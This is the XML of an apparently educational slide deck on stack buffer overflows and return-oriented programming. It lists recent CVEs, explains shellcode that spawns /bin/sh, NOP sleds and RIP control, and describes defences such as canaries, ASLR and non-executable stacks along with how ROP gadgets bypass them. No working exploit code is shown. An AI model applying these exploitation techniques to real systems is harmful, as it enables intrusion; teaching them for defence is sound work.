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0" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId50"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="282" r:id="rId4"/>
    <p:sldId id="310" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="311" r:id="rId8"/>
    <p:sldId id="315" r:id="rId9"/>
    <p:sldId id="330" r:id="rId10"/>
    <p:sldId id="333" r:id="rId11"/>
    <p:sldId id="331" r:id="rId12"/>
    <p:sldId id="332" r:id="rId13"/>
    <p:sldId id="316" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="327" r:id="rId16"/>
    <p:sldId id="328" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="260" r:id="rId19"/>
    <p:sldId id="317" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="312" r:id="rId23"/>
    <p:sldId id="329" r:id="rId24"/>
    <p:sldId id="318" r:id="rId25"/>
    <p:sldId id="299" r:id="rId26"/>
    <p:sldId id="319" r:id="rId27"/>
    <p:sldId id="264" r:id="rId28"/>
    <p:sldId id="320" r:id="rId29"/>
    <p:sldId id="300" r:id="rId30"/>
    <p:sldId id="301" r:id="rId31"/>
    <p:sldId id="302" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="322" r:id="rId34"/>
    <p:sldId id="323" r:id="rId35"/>
    <p:sldId id="324" r:id="rId36"/>
    <p:sldId id="325" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="305" r:id="rId39"/>
    <p:sldId id="306" r:id="rId40"/>
    <p:sldId id="307" r:id="rId41"/>
    <p:sldId id="308" r:id="rId42"/>
    <p:sldId id="269" r:id="rId43"/>
    <p:sldId id="265" r:id="rId44"/>
    <p:sldId id="266" r:id="rId45"/>
    <p:sldId id="268" r:id="rId46"/>
    <p:sldId id="267" r:id="rId47"/>
    <p:sldId id="271" r:id="rId48"/>
    <p:sldId id="28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5BE2A-61BE-057D-186E-FCB0C07817AF}" v="368" dt="2023-04-08T06:19:14.495"/>
    <p1510:client id="{05AFCF40-8722-474F-C688-4FF1FF00CB81}" v="37" dt="2023-04-29T02:56:37.633"/>
    <p1510:client id="{105024B4-D7CD-236B-5F2D-6AB3ECEF2AA6}" v="10" dt="2023-04-12T05:52:15.794"/>
    <p1510:client id="{14B59F59-8132-1786-621E-8AD29862BDD1}" v="1133" dt="2023-04-20T05:00:26.718"/>
    <p1510:client id="{17A1E628-A1F1-7232-4019-54782DF8E774}" v="246" dt="2023-03-28T05:58:34.375"/>
    <p1510:client id="{1B1FA43E-8C13-3B98-191D-6153494D4AE5}" v="301" dt="2023-04-09T23:44:17.516"/>
    <p1510:client id="{1B68BBD9-4433-17BC-166F-DB06636FC440}" v="6" dt="2023-04-19T03:59:39.426"/>
    <p1510:client id="{1F20230E-16FD-A0B7-D4CA-D2E32ECB68EC}" v="137" dt="2023-04-21T04:35:05.505"/>
    <p1510:client id="{217EC725-4E80-B007-9045-8F31C0E798CA}" v="912" dt="2023-04-27T05:22:28.811"/>
    <p1510:client id="{2D3D6F4F-EA8D-B40A-DEF6-34C1CE7E75FE}" v="103" dt="2023-03-28T04:20:35.307"/>
    <p1510:client id="{3334F7CC-85FC-E558-D0C3-CCFE56695B27}" v="36" dt="2023-05-16T05:02:13.040"/>
    <p1510:client id="{36B2B57B-DF56-F4E3-2AFF-01F079503BAB}" v="622" dt="2023-05-01T02:00:34.054"/>
    <p1510:client id="{3861DB01-FCC0-5DA6-D22A-8CAA398DEE39}" v="5" dt="2023-03-24T06:32:33.031"/>
    <p1510:client id="{41F170E2-E84C-B5C6-2E91-01B640CD2FCB}" v="566" dt="2023-05-03T03:30:28.585"/>
    <p1510:client id="{4FAE0BF5-0C97-2C61-E65E-D754A70D15CA}" v="22" dt="2023-04-18T03:52:29.727"/>
    <p1510:client id="{524E7028-1283-C66E-54C3-C16D54B5AB28}" v="2" dt="2023-05-15T18:43:44.813"/>
    <p1510:client id="{526F17AF-7E8B-42A7-AE5D-8187381168DA}" v="168" dt="2023-05-14T06:22:43.399"/>
    <p1510:client id="{52A7B4F0-9F8B-D2E9-964B-0530F51721ED}" v="654" dt="2023-03-30T05:37:12.441"/>
    <p1510:client id="{6C37F309-1A3E-9195-360E-2CE718712EDA}" v="66" dt="2023-04-15T05:11:31.346"/>
    <p1510:client id="{6E793414-5E3A-56F6-F555-99495E178A60}" v="12" dt="2023-05-01T01:12:57.395"/>
    <p1510:client id="{6F0F9E89-D439-5F78-6DE6-1DF58EAB31D9}" v="1" dt="2023-04-27T05:54:37.004"/>
    <p1510:client id="{75D04853-EE42-DB84-62F3-B30714BAA736}" v="40" dt="2023-04-28T04:54:04.699"/>
    <p1510:client id="{76202BD4-3528-6E7B-14FD-B51E96721C3F}" v="281" dt="2023-05-12T22:24:23.259"/>
    <p1510:client id="{7D5B07C1-CCA4-4F54-9931-7160CC56FFF2}" v="142" dt="2023-04-11T05:08:00.304"/>
    <p1510:client id="{82BBD0CD-9CA4-BC48-4D0E-BFC77DD08162}" v="403" dt="2023-04-05T06:13:30.340"/>
    <p1510:client id="{9132A92E-64D7-53D7-2F48-C85EB9012890}" v="163" dt="2023-04-21T04:12:03.513"/>
    <p1510:client id="{9EBFC05B-E489-40D0-85C6-9C74EC8DB060}" v="287" dt="2023-05-11T00:29:33.977"/>
    <p1510:client id="{A4B02402-2714-8A7C-5A4F-44E8FBD2750D}" v="227" dt="2023-04-11T05:44:16.139"/>
    <p1510:client id="{ADB99BB2-E63E-BBFF-6967-EC3E8A7D9180}" v="491" dt="2023-04-20T06:01:15.088"/>
    <p1510:client id="{AF484168-7555-F17B-70AE-5312036E1DDF}" v="211" dt="2023-04-29T05:15:36.723"/>
    <p1510:client id="{B4375250-F6DD-9C66-3ADA-713FF822F4C1}" v="92" dt="2023-03-30T04:30:33.840"/>
    <p1510:client id="{BA6AC67D-01CF-557E-26EB-D01BE2704043}" v="21" dt="2023-04-09T23:10:27.430"/>
    <p1510:client id="{BB4B3396-2C58-4A02-8087-05F150F77BB6}" v="995" dt="2023-04-12T05:44:00.848"/>
    <p1510:client id="{BD760FA2-B600-B393-B692-E3B23970ECB3}" v="139" dt="2023-04-21T05:05:37.878"/>
    <p1510:client id="{C0B5DD8B-5537-490D-1467-6CD1699AFCA0}" v="21" dt="2023-05-14T05:37:44.467"/>
    <p1510:client id="{C30A365E-0568-A7FE-73E9-964077BCC3C8}" v="247" dt="2023-05-07T02:54:34.577"/>
    <p1510:client id="{C514C319-56F8-B12D-1BF4-031000080B31}" v="32" dt="2022-10-05T04:40:17.792"/>
    <p1510:client id="{C6D9B410-065D-E912-2840-D12111841966}" v="447" dt="2023-03-25T03:01:09.245"/>
    <p1510:client id="{CB23065C-8CAF-FF51-886B-7BF2AD37DEC5}" v="221" dt="2023-03-28T02:58:37.005"/>
    <p1510:client id="{CB78E065-586D-0FA5-2A2D-E712676D5B2F}" v="119" dt="2023-04-23T15:52:12.873"/>
    <p1510:client id="{CFDF9EF3-B72E-C3B2-7449-9FAB376284F7}" v="239" dt="2023-04-30T08:04:23.509"/>
    <p1510:client id="{D69511E4-EF1F-0F41-20D5-3BBF96449B42}" v="1153" dt="2023-04-27T03:08:54.289"/>
    <p1510:client id="{E66C6E1E-F994-1E41-690E-663FCBFD28A4}" v="145" dt="2023-03-28T02:47:22.112"/>
    <p1510:client id="{E7BB97DC-FE1E-0416-6B5D-5D13EEFA50DD}" v="368" dt="2023-04-19T04:09:38.260"/>
    <p1510:client id="{F10FCD63-5DFA-43C5-BBB3-900063FCAD6E}" v="46" dt="2023-03-28T04:38:54.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F1BBE-62C3-46CF-A920-41CF3875A54A}" type="datetimeFigureOut">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A2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11666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ve.mitre.org/cgi-bin/cvekey.cgi?keyword=buffer+overflo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If we google for Buffer Overflow CVE, these are some of the most recent examples - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>CVE - Search Results (mitre.org)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>How often do we use a precompiled binary from either open source repository or a 3rd party vendor for granted?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We often trust the open-source community and vendors to be on top of patching vulnerable pre-compiled binary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>But that's not always the case. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Adversaries have a lot of free time and it may only take one vulnerable binary for the attacker to gain access.  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2021-36194</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Stack-based buffer overflows in the API controllers of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FortiWeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that may allow for arbitrary code execution .</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2022-28721</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Certain HP Print Products are vulnerable to buffer overflow that can lead to  Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2022-3602: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A buffer overrun can be triggered in X.509 certificate verification that can potentially result in Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CVE-2022-2471: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow in EZVIZ Motion Detection leads to Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1">
              <a:ea typeface="Calibri"/>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173613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the demo code that we will be using through out the rest of the presentation. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318121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Shellcode? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Is an assembly code that is used to perform a specific instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In this case, we want the shellcode to execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> so we can get a shell</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="289520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traditional buffer overflow exploit, we would place our payload to the stack, and use RIP to point the to the no-op sled address.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1767429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traditional buffer overflow exploit, we would place our payload to the stack, and use RIP to point the to the no-op sled address.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="176938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"Stack canaries" method works by placing a small integer, the value of which is randomly chosen at program start, in memory just before the stack return pointer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"ASLR":  randomization to the memory space of the executing program.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"No Stack Execution": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Another approach to preventing stack buffer overflow exploitation is to enforce a memory policy on the stack memory region that disallows execution from the stack</a:t>
            </a:r>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363768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Although controls like ASLR and no stack executions are in place to prevent BOF exploit as shown in this gif, return object programming is able to bypass these protections by leveraging machine instructions already exist in memory. These are what we call "gadgets". </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386354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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246538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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1590173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can we exploit this program?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212784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spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>ROPGadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to develop the exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We are interested in pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, ret and ret gadgets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This is because in x86_64 calling convention </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is used for the first argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want "pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" and "ret" gadgets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" will allow us to pop the value on the stack into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used for first argument of the function call</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72255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Buffer Overflow can be used for the following MITRE Tactics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Initial Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Lateral Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54793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a:t>We also need to find a couple more items to make our ROP payload chain</a:t>
            </a:r>
          </a:p>
          <a:p>
